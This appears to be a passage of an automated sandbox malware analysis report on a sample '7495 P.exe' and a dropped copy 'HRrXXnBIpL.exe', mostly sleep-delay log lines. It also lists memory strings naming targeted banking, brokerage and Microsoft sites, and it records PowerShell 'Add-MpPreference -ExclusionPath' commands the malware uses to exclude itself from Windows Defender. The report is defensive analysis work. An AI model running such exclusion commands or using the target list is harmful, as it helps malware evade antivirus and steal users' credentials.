                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -596895s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -596757s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -596641s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -596510s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -596410s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -596278s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -596152s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -596041s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -595925s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -595793s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -595693s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -595562s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -595446s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -595321s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -595207s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -595045s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -594904s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -594730s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -594624s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -594522s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -594411s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -594280s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -594164s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -594064s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -593926s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -593794s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -593678s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exe TID: 8948Thread sleep time: -593547s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 8920Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep count: 38 > 30
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -35048813740048126s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -599877s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9196Thread sleep count: 3492 > 30
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9196Thread sleep count: 6334 > 30
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -599761s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -599645s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -599531s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -599399s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -599283s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -599167s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -599045s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -598929s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -598828s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -598542s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -598424s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -598250s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -598036s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -597917s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -597801s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -597685s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -597569s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -597469s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -597347s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -597231s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -597115s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -596999s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -596883s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -596767s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -596644s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -596529s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -596413s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -596307s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -596196s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -596081s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -595938s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -595766s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -595351s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -595033s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -594909s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -594787s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -594659s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -594534s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -594409s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -593378s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -593253s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -593128s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -592944s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -592708s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -592456s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -592170s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -592025s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -591914s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -591799s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -591675s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe TID: 9192Thread sleep time: -591564s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 599858Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 599737Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 599590Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 599474Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 599343Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 599238Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 599111Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 598974Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 598833Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 598709Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 598571Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 598449Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 598315Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 598190Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 598049Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 597896Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 597747Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 597626Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 597505Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 597381Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 597243Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 597142Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 597011Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 596895Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 596757Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 596641Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 596510Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 596410Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 596278Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 596152Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 596041Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 595925Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 595793Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 595693Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 595562Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 595446Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 595321Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 595207Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 595045Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 594904Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 594730Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 594624Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 594522Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 594411Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 594280Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 594164Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 594064Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 593926Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 593794Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 593678Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeThread delayed: delay time: 593547Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 599877
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 599761
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 599645
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 599531
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 599399
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 599283
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 599167
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 599045
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 598929
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 598828
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 598542
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 598424
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 598250
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 598036
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 597917
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 597801
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 597685
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 597569
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 597469
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 597347
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 597231
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 597115
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 596999
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 596883
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 596767
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 596644
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 596529
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 596413
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 596307
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 596196
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 596081
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 595938
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 595766
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 595351
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 595033
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 594909
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 594787
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 594659
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 594534
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 594409
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 593378
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 593253
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 593128
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 592944
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 592708
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 592456
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 592170
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 592025
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 591914
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 591799
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 591675
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeThread delayed: delay time: 591564
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: HRrXXnBIpL.exe, 0000000E.00000002.1375540771.000000000091B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3728471829.0000000001537000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: 7495 P.exe, 0000000D.00000002.3728239100.000000000154D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: HRrXXnBIpL.exe, 00000012.00000002.3737271731.000000000439D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F89668 LdrInitializeThunk,13_2_06F89668
                  Source: C:\Users\user\Desktop\7495 P.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\7495 P.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\7495 P.exe"
                  Source: C:\Users\user\Desktop\7495 P.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe"
                  Source: C:\Users\user\Desktop\7495 P.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\7495 P.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\7495 P.exe"Jump to behavior
